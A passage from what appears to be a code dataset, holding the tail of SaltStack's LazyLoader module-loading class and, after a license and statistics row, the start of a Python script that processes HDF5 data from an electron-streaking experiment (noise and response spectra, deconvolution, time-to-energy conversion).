): # pylint: disable=W0231
self.inject_globals = {}
self.opts = self.__prep_mod_opts(opts)
self.module_dirs = module_dirs
if opts is None:
opts = {}
self.tag = tag
self.loaded_base_name = loaded_base_name or LOADED_BASE_NAME
self.mod_type_check = mod_type_check or _mod_type
self.pack = {} if pack is None else pack
if '__context__' not in self.pack:
self.pack['__context__'] = {}
self.whitelist = whitelist
self.virtual_enable = virtual_enable
self.initial_load = True
# names of modules that we don't have (errors, __virtual__, etc.)
self.missing_modules = {} # mapping of name -> error
self.loaded_modules = {} # mapping of module_name -> dict_of_functions
self.loaded_files = set() # TODO: just remove them from file_mapping?
self.disabled = set(self.opts.get('disable_{0}s'.format(self.tag), []))
self.refresh_file_mapping()
super(LazyLoader, self).__init__() # late init the lazy loader
# create all of the import namespaces
_generate_module('{0}.int'.format(self.loaded_base_name))
_generate_module('{0}.int.{1}'.format(self.loaded_base_name, tag))
_generate_module('{0}.ext'.format(self.loaded_base_name))
_generate_module('{0}.ext.{1}'.format(self.loaded_base_name, tag))
def __getitem__(self, item):
'''
Override the __getitem__ in order to decorate the returned function if we need
to last-minute inject globals
'''
func = super(LazyLoader, self).__getitem__(item)
if self.inject_globals:
return global_injector_decorator(self.inject_globals)(func)
else:
return func
def __getattr__(self, mod_name):
'''
Allow for "direct" attribute access-- this allows jinja templates to
access things like `salt.test.ping()`
'''
# if we have an attribute named that, lets return it.
try:
return object.__getattr__(self, mod_name)
except AttributeError:
pass
# otherwise we assume its jinja template access
if mod_name not in self.loaded_modules and not self.loaded:
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and mod_name in self.loaded_modules:
break
if mod_name in self.loaded_modules:
return self.loaded_modules[mod_name]
else:
raise AttributeError(mod_name)
def missing_fun_string(self, function_name):
'''
Return the error string for a missing function.
This can range from "not available' to "__virtual__" returned False
'''
mod_name = function_name.split('.')[0]
if mod_name in self.loaded_modules:
return '\'{0}\' is not available.'.format(function_name)
else:
try:
reason = self.missing_modules[mod_name]
except KeyError:
return '\'{0}\' is not available.'.format(function_name)
else:
if reason is not None:
return '\'{0}\' __virtual__ returned False: {1}'.format(mod_name, reason)
else:
return '\'{0}\' __virtual__ returned False'.format(mod_name)
def refresh_file_mapping(self):
'''
refresh the mapping of the FS on disk
'''
# map of suffix to description for imp
self.suffix_map = {}
suffix_order = [] # local list to determine precedence of extensions
for (suffix, mode, kind) in imp.get_suffixes():
self.suffix_map[suffix] = (suffix, mode, kind)
suffix_order.append(suffix)
if self.opts.get('cython_enable', True) is True:
try:
global pyximport
pyximport = __import__('pyximport') # pylint: disable=import-error
pyximport.install()
# add to suffix_map so file_mapping will pick it up
self.suffix_map['.pyx'] = tuple()
except ImportError:
log.info('Cython is enabled in the options but not present '
'in the system path. Skipping Cython modules.')
# Allow for zipimport of modules
if self.opts.get('enable_zip_modules', True) is True:
self.suffix_map['.zip'] = tuple()
# allow for module dirs
self.suffix_map[''] = ('', '', imp.PKG_DIRECTORY)
# create mapping of filename (without suffix) to (path, suffix)
self.file_mapping = {}
for mod_dir in self.module_dirs:
files = []
try:
files = os.listdir(mod_dir)
except OSError:
continue
for filename in files:
try:
if filename.startswith('_'):
# skip private modules
# log messages omitted for obviousness
continue
f_noext, ext = os.path.splitext(filename)
# make sure it is a suffix we support
if ext not in self.suffix_map:
continue
if f_noext in self.disabled:
log.trace(
'Skipping {0}, it is disabled by configuration'.format(
filename
)
)
continue
fpath = os.path.join(mod_dir, filename)
# if its a directory, lets allow us to load that
if ext == '':
# is there something __init__?
subfiles = os.listdir(fpath)
sub_path = None
for suffix in suffix_order:
init_file = '__init__{0}'.format(suffix)
if init_file in subfiles:
sub_path = os.path.join(fpath, init_file)
break
if sub_path is not None:
self.file_mapping[f_noext] = (fpath, ext)
# if we don't have it, we want it
elif f_noext not in self.file_mapping:
self.file_mapping[f_noext] = (fpath, ext)
# if we do, we want it if we have a higher precidence ext
else:
curr_ext = self.file_mapping[f_noext][1]
#log.debug("****** curr_ext={0} ext={1} suffix_order={2}".format(curr_ext, ext, suffix_order))
if curr_ext and suffix_order.index(ext) < suffix_order.index(curr_ext):
self.file_mapping[f_noext] = (fpath, ext)
except OSError:
continue
def clear(self):
'''
Clear the dict
'''
super(LazyLoader, self).clear() # clear the lazy loader
self.loaded_files = set()
self.missing_modules = {}
self.loaded_modules = {}
# if we have been loaded before, lets clear the file mapping since
# we obviously want a re-do
if hasattr(self, 'opts'):
self.refresh_file_mapping()
self.initial_load = False
def __prep_mod_opts(self, opts):
'''
Strip out of the opts any logger instance
'''
if 'grains' in opts:
self._grains = opts['grains']
else:
self._grains = {}
if 'pillar' in opts:
self._pillar = opts['pillar']
else:
self._pillar = {}
mod_opts = {}
for key, val in list(opts.items()):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _iter_files(self, mod_name):
'''
Iterate over all file_mapping files in order of closeness to mod_name
'''
# do we have an exact match?
if mod_name in self.file_mapping:
yield mod_name
# do we have a partial match?
for k in self.file_mapping:
if mod_name in k:
yield k
# anyone else? Bueller?
for k in self.file_mapping:
if mod_name not in k:
yield k
def _reload_submodules(self, mod):
submodules = (
getattr(mod, sname) for sname in dir(mod) if
isinstance(getattr(mod, sname), mod.__class__)
)
# reload only custom "sub"modules
for submodule in submodules:
# it is a submodule if the name is in a namespace under mod
if submodule.__name__.startswith(mod.__name__ + '.'):
reload(submodule)
self._reload_submodules(submodule)
def _load_module(self, name):
mod = None
fpath, suffix = self.file_mapping[name]
self.loaded_files.add(name)
fpath_dirname = os.path.dirname(fpath)
try:
sys.path.append(fpath_dirname)
if suffix == '.pyx':
mod = pyximport.load_module(name, fpath, tempfile.gettempdir())
elif suffix == '.o':
top_mod = __import__(fpath, globals(), locals(), [])
comps = fpath.split('.')
if len(comps) < 2:
mod = top_mod
else:
mod = top_mod
for subname in comps[1:]:
mod = getattr(mod, subname)
elif suffix == '.zip':
mod = zipimporter(fpath).load_module(name)
else:
desc = self.suffix_map[suffix]
# if it is a directory, we don't open a file
if suffix == '':
mod = imp.load_module(
'{0}.{1}.{2}.{3}'.format(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name
), None, fpath, desc)
# reload all submodules if necessary
if not self.initial_load:
self._reload_submodules(mod)
else:
with salt.utils.fopen(fpath, desc[1]) as fn_:
mod = imp.load_module(
'{0}.{1}.{2}.{3}'.format(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name
), fn_, fpath, desc)
except IOError:
raise
except ImportError:
log.debug(
'Failed to import {0} {1}:\n'.format(
self.tag, name
),
exc_info=True
)
return False
except Exception as error:
log.error(
'Failed to import {0} {1}, this is due most likely to a '
'syntax error:\n'.format(
self.tag, name
),
exc_info=True
)
return False
except SystemExit:
log.error(
'Failed to import {0} {1} as the module called exit()\n'.format(
self.tag, name
),
exc_info=True
)
return False
finally:
sys.path.remove(fpath_dirname)
if hasattr(mod, '__opts__'):
mod.__opts__.update(self.opts)
else:
mod.__opts__ = self.opts
mod.__grains__ = self._grains
mod.__pillar__ = self._pillar
# pack whatever other globals we were asked to
for p_name, p_value in six.iteritems(self.pack):
setattr(mod, p_name, p_value)
module_name = mod.__name__.rsplit('.', 1)[-1]
# Call a module's initialization method if it exists
module_init = getattr(mod, '__init__', None)
if inspect.isfunction(module_init):
try:
module_init(self.opts)
except TypeError as e:
log.error(e)
except Exception:
err_string = '__init__ failed'
log.debug(
'Error loading {0}.{1}: {2}'.format(
self.tag,
module_name,
err_string),
exc_info=True)
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
# if virtual modules are enabled, we need to look for the
# __virtual__() function inside that module and run it.
if self.virtual_enable:
(virtual_ret, module_name, virtual_err) = self.process_virtual(
mod,
module_name,
)
if virtual_err is not None:
log.debug('Error loading {0}.{1}: {2}'.format(self.tag,
module_name,
virtual_err,
))
# if process_virtual returned a non-True value then we are
# supposed to not process this module
if virtual_ret is not True:
# If a module has information about why it could not be loaded, record it
self.missing_modules[module_name] = virtual_err
self.missing_modules[name] = virtual_err
return False
# If this is a proxy minion then MOST modules cannot work. Therefore, require that
# any module that does work with salt-proxy-minion define __proxyenabled__ as a list
# containing the names of the proxy types that the module supports.
#
# Render modules and state modules are OK though
if 'proxy' in self.opts:
if self.tag in ['grains', 'proxy']:
if not hasattr(mod, '__proxyenabled__') or \
(self.opts['proxy']['proxytype'] not in mod.__proxyenabled__ and
'*' not in mod.__proxyenabled__):
err_string = 'not a proxy_minion enabled module'
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
if getattr(mod, '__load__', False) is not False:
log.info(
'The functions from module {0!r} are being loaded from the '
'provided __load__ attribute'.format(
module_name
)
)
mod_dict = salt.utils.odict.OrderedDict()
for attr in getattr(mod, '__load__', dir(mod)):
if attr.startswith('_'):
# private functions are skipped
continue
func = getattr(mod, attr)
if not inspect.isfunction(func):
# Not a function!? Skip it!!!
continue
# Let's get the function name.
# If the module has the __func_alias__ attribute, it must be a
# dictionary mapping in the form of(key -> value):
# <real-func-name> -> <desired-func-name>
#
# It default's of course to the found callable attribute name
# if no alias is defined.
funcname = getattr(mod, '__func_alias__', {}).get(attr, attr)
# Save many references for lookups
self._dict['{0}.{1}'.format(module_name, funcname)] = func
setattr(mod_dict, funcname, func)
mod_dict[funcname] = func
self._apply_outputter(func, mod)
# enforce depends
try:
Depends.enforce_dependencies(self._dict, self.tag)
except RuntimeError as e:
log.info('Depends.enforce_dependencies() failed '
'for reasons: {0}'.format(e))
self.loaded_modules[module_name] = mod_dict
return True
def _load(self, key):
'''
Load a single item if you have it
'''
# if the key doesn't have a '.' then it isn't valid for this mod dict
if not isinstance(key, six.string_types) or '.' not in key:
raise KeyError
mod_name, _ = key.split('.', 1)
if mod_name in self.missing_modules:
return True
# if the modulename isn't in the whitelist, don't bother
if self.whitelist and mod_name not in self.whitelist:
raise KeyError
def _inner_load(mod_name):
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and key in self._dict:
return True
return False
# try to load the module
ret = None
reloaded = False
# re-scan up to once, IOErrors or a failed load cause re-scans of the
# filesystem
while True:
try:
ret = _inner_load(mod_name)
if not reloaded and ret is not True:
self.refresh_file_mapping()
reloaded = True
continue
break
except IOError:
if not reloaded:
self.refresh_file_mapping()
reloaded = True
continue
return ret
def _load_all(self):
'''
Load all of them
'''
for name in self.file_mapping:
if name in self.loaded_files or name in self.missing_modules:
continue
self._load_module(name)
self.loaded = True
def _apply_outputter(self, func, mod):
'''
Apply the __outputter__ variable to the functions
'''
if hasattr(mod, '__outputter__'):
outp = mod.__outputter__
if func.__name__ in outp:
func.__outputter__ = outp[func.__name__]
def process_virtual(self, mod, module_name):
'''
Given a loaded module and its default name determine its virtual name
This function returns a tuple. The first value will be either True or
False and will indicate if the module should be loaded or not (i.e. if
it threw and exception while processing its __virtual__ function). The
second value is the determined virtual name, which may be the same as
the value provided.
The default name can be calculated as follows::
module_name = mod.__name__.rsplit('.', 1)[-1]
'''
# The __virtual__ function will return either a True or False value.
# If it returns a True value it can also set a module level attribute
# named __virtualname__ with the name that the module should be
# referred to as.
#
# This allows us to have things like the pkg module working on all
# platforms under the name 'pkg'. It also allows for modules like
# augeas_cfg to be referred to as 'augeas', which would otherwise have
# namespace collisions. And finally it allows modules to return False
# if they are not intended to run on the given platform or are missing
# dependencies.
try:
error_reason = None
if hasattr(mod, '__virtual__') and inspect.isfunction(mod.__virtual__):
try:
start = time.time()
virtual = mod.__virtual__()
if isinstance(virtual, tuple):
error_reason = virtual[1]
virtual = virtual[0]
if self.opts.get('virtual_timer', False):
end = time.time() - start
msg = 'Virtual function took {0} seconds for {1}'.format(
end, module_name)
log.warning(msg)
except Exception as exc:
error_reason = ('Exception raised when processing __virtual__ function'
' for {0}. Module will not be loaded {1}'.format(
module_name, exc))
log.error(error_reason)
virtual = None
# Get the module's virtual name
virtualname = getattr(mod, '__virtualname__', virtual)
if not virtual:
# if __virtual__() evaluates to False then the module
# wasn't meant for this platform or it's not supposed to
# load for some other reason.
# Some modules might accidentally return None and are
# improperly loaded
if virtual is None:
log.warning(
'{0}.__virtual__() is wrongly returning `None`. '
'It should either return `True`, `False` or a new '
'name. If you\'re the developer of the module '
'{1!r}, please fix this.'.format(
mod.__name__,
module_name
)
)
return (False, module_name, error_reason)
# At this point, __virtual__ did not return a
# boolean value, let's check for deprecated usage
# or module renames
if virtual is not True and module_name != virtual:
# The module is renaming itself. Updating the module name
# with the new name
log.trace('Loaded {0} as virtual {1}'.format(
module_name, virtual
))
if not hasattr(mod, '__virtualname__'):
salt.utils.warn_until(
'Hydrogen',
'The {0!r} module is renaming itself in it\'s '
'__virtual__() function ({1} => {2}). Please '
'set it\'s virtual name as the '
'\'__virtualname__\' module attribute. '
'Example: "__virtualname__ = {2!r}"'.format(
mod.__name__,
module_name,
virtual
)
)
if virtualname != virtual:
# The __virtualname__ attribute does not match what's
# being returned by the __virtual__() function. This
# should be considered an error.
log.error(
'The module {0!r} is showing some bad usage. It\'s '
'__virtualname__ attribute is set to {1!r} yet the '
'__virtual__() function is returning {2!r}. These '
'values should match!'.format(
mod.__name__,
virtualname,
virtual
)
)
module_name = virtualname
# If the __virtual__ function returns True and __virtualname__ is set then use it
elif virtual is True and virtualname != module_name:
if virtualname is not True:
module_name = virtualname
except KeyError:
# Key errors come out of the virtual function when passing
# in incomplete grains sets, these can be safely ignored
# and logged to debug, still, it includes the traceback to
# help debugging.
log.debug(
'KeyError when loading {0}'.format(module_name),
exc_info=True
)
except Exception:
# If the module throws an exception during __virtual__()
# then log the information and continue to the next.
log.error(
'Failed to read the virtual function for '
'{0}: {1}'.format(
self.tag, module_name
),
exc_info=True
)
return (False, module_name, error_reason)
return (True, module_name, None)
def global_injector_decorator(inject_globals):
'''
Decorator used by the LazyLoader to inject globals into a function at
execute time.
globals
Dictionary with global variables to inject
'''
def inner_decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
with context.func_globals_inject(f, **inject_globals):
return f(*args, **kwargs)
return wrapper
return inner_decorator
|
apache-2.0
| 7,259,339,349,541,373,000 | 33.71419 | 118 | 0.503326 | false |
aolindahl/streaking
|
process_hdf5.py
|
1
|
46151
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 8 15:37:51 2015
@author: Anton O Lindahl
"""
import h5py
import argparse
import matplotlib.pyplot as plt
import numpy as np
import time
import os
import sys
import lmfit
import warnings
from aolPyModules import wiener, wavelet_filter
import time_to_energy_conversion as tof_to_energy
from aolPyModules import plotting as aol_plotting
import area_fill
prompt_roi = [1.508, 1.535]
streak_time_roi = [1.57, 1.66]
wt_th = 0.03
energy_scale_eV = np.linspace(40, 160, 2**9)
time_stamp = 'time_stamp'
data_dir = 'h5_files'
h5_file_name_template = data_dir + '/run{}_all.h5'
response_file_name = data_dir + '/response.h5'
nois_file_name = data_dir + '/noise.h5'
tof_to_energy_conversion_file_name = data_dir + '/time_to_energy.h5'
def h5_file_name_funk(run):
return h5_file_name_template.format(run)
def update_progress(i_evt, n_events, verbose=True):
if (verbose and
((i_evt % (n_events / 100) == 0) or (i_evt == n_events-1))):
progress = (100 * i_evt) / (n_events - 1)
num_squares = 40
base_string = '\r[{:' + str(num_squares) + '}] {}%'
print base_string.format('#'*(progress * num_squares / 100), progress),
sys.stdout.flush()
def list_hdf5_content(group, indent=' '):
for k, v in group.iteritems():
print '{}"{}"'.format(indent, k),
if isinstance(v, h5py.Group):
print 'group with members:'
list_hdf5_content(v, indent=indent + ' ')
elif isinstance(v, h5py.Dataset):
print '\t{} {}'.format(v.shape, v.dtype)
def make_dataset(h5, name, shape, dtype=np.float):
try:
dset = h5.require_dataset(name, shape=shape,
dtype=dtype, exact=True)
except TypeError:
del h5[name]
dset = h5.create_dataset(name, shape=shape, dtype=np.float)
if time_stamp not in dset.attrs.keys():
dset.attrs.create(time_stamp, 0)
return dset
def make_group(h5, name):
try:
group = h5.require_group(name)
except TypeError:
del h5[name]
group = h5.create_group(name)
if time_stamp not in group.attrs.keys():
group.attrs.create(time_stamp, 0)
return group
def older(dset, dset_list):
if (isinstance(dset_list, h5py.Dataset) or
isinstance(dset_list, h5py.Group)):
return dset.attrs[time_stamp] < dset_list.attrs[time_stamp]
return np.any([dset.attrs[time_stamp] < d.attrs[time_stamp] for
d in dset_list])
class Timer_object:
def __init__(self, t):
self.attrs = {'time_stamp': t}
class Tims_stamp_warning(Warning):
pass
def time_stamp_object(h5_object):
try:
h5_object.attrs['time_stamp'] = time.time()
except:
warnings.warn('Could not time stamp the object {}.'.format(
repr(h5_object)))
def get_response(plot=False, verbose=0):
try:
with h5py.File(response_file_name, 'r') as f:
response = f['signal'].value
t = f['signal'].attrs[time_stamp]
except IOError:
if verbose > 0:
print 'Could not open response file. Trying to make it.'
response, t = construct_response(verbose=verbose)
if plot:
with h5py.File(response_file_name, 'r') as f:
time_scale = f['time_scale'].value
plt.figure('response')
plt.clf()
plt.plot(time_scale, response)
return response, t
def construct_response(plot=False, verbose=0):
# The Kr runs
runs = [132, 133, 134, 135, 136]
if verbose > 0:
print 'Loading Kr files for prompt determination.'
h5_file_names = [h5_file_name_template.format(run) for run in runs]
h5_list = []
for file_name in h5_file_names:
update_run_contained_derived_data(file_name, verbose=verbose)
h5_list.append(h5py.File(file_name, 'r+'))
time_scale = h5_list[0]['raw/time_scale'].value
response = np.zeros_like(time_scale)
n_shots = 0
sl = slice(time_scale.searchsorted(prompt_roi[0]),
time_scale.searchsorted(prompt_roi[1], side='right'))
for h5 in h5_list:
response[sl] += h5['raw/time_signal'][:, sl].sum(0)
n_shots += h5['raw/event_time_s'].shape[0]
response /= n_shots
response[sl] = wiener.edgeSmoothing(response[sl], smoothPoints=15)
response /= response.sum()
with h5py.File(response_file_name, 'w') as res_file:
dset = res_file.create_dataset('signal', data=response)
dset.attrs.create(time_stamp, time.time())
res_file.create_dataset('time_scale', data=time_scale)
return get_response(plot=plot, verbose=verbose)
def get_file_names_for_noise_spectrum():
return ['/'.join([data_dir, f]) for f in os.listdir(data_dir) if
f.startswith('run') and f.endswith('_all.h5')]
def get_nois_spectrum(plot=False, verbose=0):
try:
with h5py.File(nois_file_name, 'r') as f:
pass
new_noise = False
except IOError:
if verbose > 0:
print 'Could not open response file. Trying to make it.',
print 'In "get_nois_spectrum()".'
construct_nois_spectrum(plot=plot, verbose=verbose)
new_noise = True
if not new_noise:
make_new_noise = False
with h5py.File(nois_file_name, 'r') as f:
noise = f['noise']
h5_file_names = get_file_names_for_noise_spectrum()
for h5_name in h5_file_names:
with h5py.File(h5_name, 'r') as h5:
if older(noise, h5['raw']):
make_new_noise = True
if verbose > 0:
print 'Noise was made earlier than the raw data',
print 'in the file', h5_name, 'Make new noise.'
break
elif False:
print 'Noise was made later than the raw data in',
print 'the file', h5_name
if make_new_noise:
construct_nois_spectrum(plot=plot, verbose=verbose)
with h5py.File(nois_file_name, 'r') as f:
noise = f['noise']
return noise.value, noise.attrs['time_stamp']
def construct_nois_spectrum(plot=False, verbose=0):
h5_file_names = get_file_names_for_noise_spectrum()
for file_name in h5_file_names:
update_run_contained_derived_data(file_name)
empty_shots = []
for i, h5_name in enumerate(h5_file_names):
with h5py.File(h5_name, 'r') as h5:
time_signal_dset = h5['raw/time_signal']
try:
max_signal = h5['max_signal'].value
except KeyError:
max_signal = np.max(time_signal_dset.value, axis=1)
no_x_rays = max_signal < 0.04
if no_x_rays.sum() > 0:
empty_shots.extend(time_signal_dset[no_x_rays, :])
if i == 0:
time_scale = h5['raw/time_scale'].value
if verbose > 0:
print h5_name, 'has', no_x_rays.sum(), 'empty shots'
empty_shots = np.array(empty_shots)
# print len(empty_shots)
# plt.figure('snr')
# plt.clf()
# for shot in empty_shots[:]:
# plt.plot(time_scale, shot)
freq = (np.linspace(0., 1., len(time_scale)) *
1e-3/(time_scale[1] - time_scale[0]))
fft_empty_shots = np.fft.fft(empty_shots, axis=1)
amp = np.mean(np.abs(fft_empty_shots)**2, axis=0)
wt_amp = amp[:]
wt_amp = wavelet_filter.wavelet_filt(amp[1:], thresh=wt_th)
wt_amp[1:] = (wt_amp[1:] + wt_amp[-1:0:-1]) / 2
# plt.figure('fft')
# plt.clf()
# plt.plot(freq, amp)
# plt.plot(freq, wt_amp, 'r')
with h5py.File(nois_file_name, 'w') as f:
dset = f.create_dataset('noise', data=wt_amp)
dset.attrs.create('time_stamp', time.time())
f.create_dataset('freq', data=freq)
return get_nois_spectrum()
def construct_snr_spectrum(h5, plot=False):
noise, t = get_nois_spectrum()
sig_spec = h5['fft_spectrum_mean'].value
freq = h5['fft_freq_axis'].value
wt_spec = wavelet_filter.wavelet_filt(sig_spec, thresh=wt_th)
wt_spec[1:] = (wt_spec[1:] + wt_spec[-1:0:-1]) / 2
snr = (wt_spec - noise) / noise
if plot:
plt.figure('signal and noise')
plt.clf()
plt.semilogy(freq, sig_spec, label='signal')
plt.semilogy(freq, noise, label='noise')
plt.semilogy(freq, wt_spec, label='wt signal')
plt.semilogy(freq, snr, label='snr')
plt.legend(loc='best')
return snr
def check_tof_to_energy_conversion_matrix(plot=False, verbose=0):
try:
with h5py.File(tof_to_energy_conversion_file_name, 'r'):
pass
except IOError:
if verbose > 0:
print 'Could not open the file. Making the conversion matrix.'
construc_tof_to_energy_conversion_matrix(plot=plot, verbose=verbose)
_, h5_dict, _ = tof_to_energy.load_tof_to_energy_data(verbose=verbose)
with h5py.File(tof_to_energy_conversion_file_name, 'r') as trans_h5:
if not older(
trans_h5['matrix'],
[h5['streak_peak_integral'] for h5 in h5_dict.itervalues()] +
[Timer_object(1437117486)]):
return
if verbose > 0:
print 'Conversion to old, remaking it.'
construc_tof_to_energy_conversion_matrix(plot=plot, verbose=verbose)
def construc_tof_to_energy_conversion_matrix(plot=False, verbose=0):
M, t, E, time_to_energy_params, tof_prediction_params = \
tof_to_energy.make_tof_to_energy_matrix(
energy_scale_eV=energy_scale_eV, plot=plot, verbose=verbose)
with h5py.File(tof_to_energy_conversion_file_name, 'w') as h5:
dset = h5.create_dataset('matrix', data=M)
dset.attrs.create('time_stamp', time.time())
dset = h5.create_dataset('time_scale', data=t)
dset.attrs.create('time_stamp', time.time())
dset = h5.create_dataset('energy_scale_eV', data=E)
dset.attrs.create('time_stamp', time.time())
for k in time_to_energy_params:
dset = h5.create_dataset(k, data=time_to_energy_params[k].value)
dset.attrs.create('time_stamp', time.time())
for k in tof_prediction_params:
dset = h5.require_dataset(k, (), np.float)
dset[()] = tof_prediction_params[k].value
dset.attrs.create('time_stamp', time.time())
def open_hdf5_file(file_name, plot=False, verbose=0):
try:
# Open the file
h5 = h5py.File(file_name, 'r+')
except BaseException as e:
print 'Could not open the specified hdf5 file "{}".'.format(
file_name)
print 'Message was: {}'.format(e.message)
return -1
return h5
def get_com(x, y):
idx_l, idx_h = fwxm(x, y, 0.0, return_data='idx')
sl = slice(idx_l, idx_h)
return ((x[sl] * y[sl]).sum()) / (y[sl].sum())
def fwxm(x, y, fraction=0.5, return_data=''):
y_max = y.max()
idx_max = y.argmax()
y_f = y_max * fraction
for i in range(idx_max, -1, -1):
if y[i] < y_f:
idx_low = i
break
else:
idx_low = idx_max
for i in range(idx_max, len(x)):
if y[i] < y_f:
idx_high = i
break
else:
idx_high = idx_max
if return_data == 'idx':
return idx_low, idx_high
if return_data == 'limits':
return x[idx_low], x[idx_high]
return (x[idx_low] + x[idx_high]) / 2, x[idx_high] - x[idx_low]
def get_trace_bounds(x, y,
threshold=0.0, min_width=2,
energy_offset=0,
useRel=False, threshold_rel=0.5,
roi=slice(None)):
amp = y[roi]
scale = x[roi]
dx = np.mean(np.diff(x))
if useRel:
threshold_temp = threshold_rel * np.max(amp[np.isfinite(amp)])
if threshold_temp < threshold:
return [np.nan] * 3
else:
threshold_V = threshold_temp
else:
threshold_V = threshold
nPoints = np.round(min_width/dx)
i_min = 0
for i in range(1, amp.size):
if amp[i] < threshold_V:
i_min = i
continue
if i-i_min >= nPoints:
break
else:
return [np.nan] * 3
i_max = amp.size - 1
for i in range(amp.size-1, -1, -1):
if amp[i] < threshold_V:
i_max = i
continue
if i_max-i >= nPoints:
break
else:
return [np.nan] * 3
if i_min == 0 and i_max == amp.size - 1:
return [np.nan] * 3
# print 'min =', min, 'max =', max
val_max = (scale[i_max] + (threshold_V - amp[i_max]) *
(scale[i_max] - scale[i_max - 1]) /
(amp[i_max] - amp[i_max - 1]))
val_min = (scale[i_min] + (threshold_V - amp[i_min]) *
(scale[i_min + 1] - scale[i_min]) /
(amp[i_min + 1] - amp[i_min]))
return val_min, val_max, threshold_V
def update_run_contained_derived_data(file_name, plot=False, verbose=0):
"""Update derived data based on information only in given file.
Add some derived datasetd to the hdf5 file based on the raw data in the
file. The added datasets are:
- Mean of the FEE gas detectors for each shot: fee_mean
- Maximum TOF waveform signal for each shot: max_signal
- Frequency spectrum averaged over all shots: fft_spectrum_mean
- The corresponding frequency axis: fft_freq_axis
- BC2 energy calculated from the beam position: energy_BC2_MeV
- L3 energy corrected based on the BC2 energy: energy_L3_corrected_MeV
"""
if verbose > 0:
print 'Entering "update_run_contained_derived_data()" ',
print 'with file_name={}'.format(file_name)
h5 = open_hdf5_file(file_name, plot, verbose)
raw_group = h5['raw']
n_events = raw_group['event_time_s'].shape[0]
# Make the fee data set
raw_fee_dset = raw_group['FEE_energy_mJ']
fee_mean_dset = make_dataset(h5, 'fee_mean', (n_events,))
if older(fee_mean_dset, raw_group):
if verbose > 0:
print 'Updating fee mean dataset'
fee_mean_dset[:] = raw_fee_dset[:, 0: 4].mean(1)
fee_mean_dset.attrs[time_stamp] = time.time()
# Make max signal dataset
time_signal_dset = raw_group['time_signal']
max_sig_dset = make_dataset(h5, 'max_signal', (n_events,))
if older(max_sig_dset, raw_group):
if verbose > 0:
print 'Get the maximum signal for each shot.'
max_sig_dset[:] = np.max(time_signal_dset, axis=1)
max_sig_dset.attrs['time_stamp'] = time.time()
# Make the frequency spectrum
time_scale = raw_group['time_scale'].value
spectrum_dset = make_dataset(h5, 'fft_spectrum_mean', time_scale.shape)
if older(spectrum_dset, [raw_group, max_sig_dset]):
if verbose > 0:
print 'Compute the frequency spectrum of the data.'
max_signal = max_sig_dset.value
use = max_signal > np.sort(max_signal)[-500:][0]
signal = time_signal_dset[use, :]
spectrum_dset[:] = np.mean(np.abs(np.fft.fft(signal, axis=1))**2,
axis=0)
spectrum_dset.attrs['time_stamp'] = time.time()
freq_axis_dset = make_dataset(h5, 'fft_freq_axis', time_scale.shape)
if older(freq_axis_dset, raw_group):
if verbose > 0:
print 'Updating the frequency axis.'
freq_axis_dset[:] = (np.linspace(0., 1e-3, len(time_scale)) /
(time_scale[1] - time_scale[0]))
freq_axis_dset.attrs['time_stamp'] = time.time()
# Calculate the BC2 energy
bc2_energy_dset = make_dataset(h5, 'energy_BC2_MeV', (n_events, ))
if older(bc2_energy_dset, raw_group):
if verbose > 0:
print 'Calculating BC2 energy for the bpm reading.'
# Values comes from a mail from Timothy Maxwell
# The nominal BC2 energy is 5 GeV (was at least when this data was
# recorded). The measurement is the relative offset of the beam
# position in a BPM. The dispersion value is -364.7 mm.
bc2_energy_dset[:] = 5e3 * (1. - raw_group['position_BC2_mm'][:] /
364.7)
bc2_energy_dset.attrs['time_stamp'] = time.time()
# Calculate the corrected L3 energy
l3_energy_cor_dset = make_dataset(h5, 'energy_L3_corrected_MeV',
(n_events, ))
if older(l3_energy_cor_dset, [raw_group, bc2_energy_dset,
Timer_object(1434096408)]):
if verbose > 0:
print 'Calculating corrected L3 energy.'
l3_energy_cor_dset[:] = (raw_group['energy_L3_MeV'][:] -
(bc2_energy_dset[:] - 5000))
l3_energy_cor_dset.attrs['time_stamp'] = time.time()
# Make the phase cavity time filter
pct_filter_dset = make_dataset(h5, 'pct_filter', (n_events, ),
dtype=bool)
if older(pct_filter_dset, [raw_group, Timer_object(0)]):
print h5.filename
pct0 = raw_group['phase_cavity_times'][:, 0]
pct_filter_dset[:] = (0.4 < pct0) & (pct0 < 1.2)
pct_filter_dset.attrs[time_stamp] = time.time()
h5.close()
def update_with_noise_and_response(file_name, plot=False, verbose=0):
"""Update derived data based on noise and response spectra.
Noise spectrum and detector response are determined form many runs. With
these spectra a number of new paramters can be derived. These are:
- snr_spectrum: Signal to Noise ratio spectrum based on the given noise \
spectrum and the average spectrum in the current run.
- filtered_time_signal: Wiegner deconvolution of the time signal based on \
the signal to noise ratio and the detector response function.
- streak_peak_center: Center of the streaking peak in the sense of the \
center of mass of the peak in a given ROI. Based on the deconvoluted \
signal.
- streak_peak_integral: Photoline intensity by integration of the \
deconvoluted spectrum in time domain.
"""
# Make sure that the run contained information is up to date.
update_run_contained_derived_data(file_name, plot, verbose-1)
# Open the file.
h5 = open_hdf5_file(file_name, plot, verbose)
raw_group = h5['raw']
n_events = raw_group['event_time_s'].shape[0]
time_scale = raw_group['time_scale'].value
# Make signal to noise ratio.
snr_dset = make_dataset(h5, 'snr_spectrum', time_scale.shape)
spectrum_dset = h5['fft_spectrum_mean']
if older(snr_dset, [spectrum_dset, raw_group, Timer_object(1434015914)]):
if verbose > 0:
print 'Updating the signal to noise ratio.',
print ' In "update_with_noise_and_response()"',
print ' with file_name={}'.format(file_name)
snr_dset[:] = construct_snr_spectrum(h5, plot=plot)
snr_dset.attrs['time_stamp'] = time.time()
# Deconvolute the response function
time_signal_dset = raw_group['time_signal']
deconv_time_signal_dset = make_dataset(h5, 'filtered_time_signal',
time_signal_dset.shape)
if older(deconv_time_signal_dset, [raw_group, snr_dset]):
response, t_response = get_response(plot=plot, verbose=verbose-1)
if verbose > 0:
print 'Deconvolving traces.'
print ' In "update_with_noise_and_response()"',
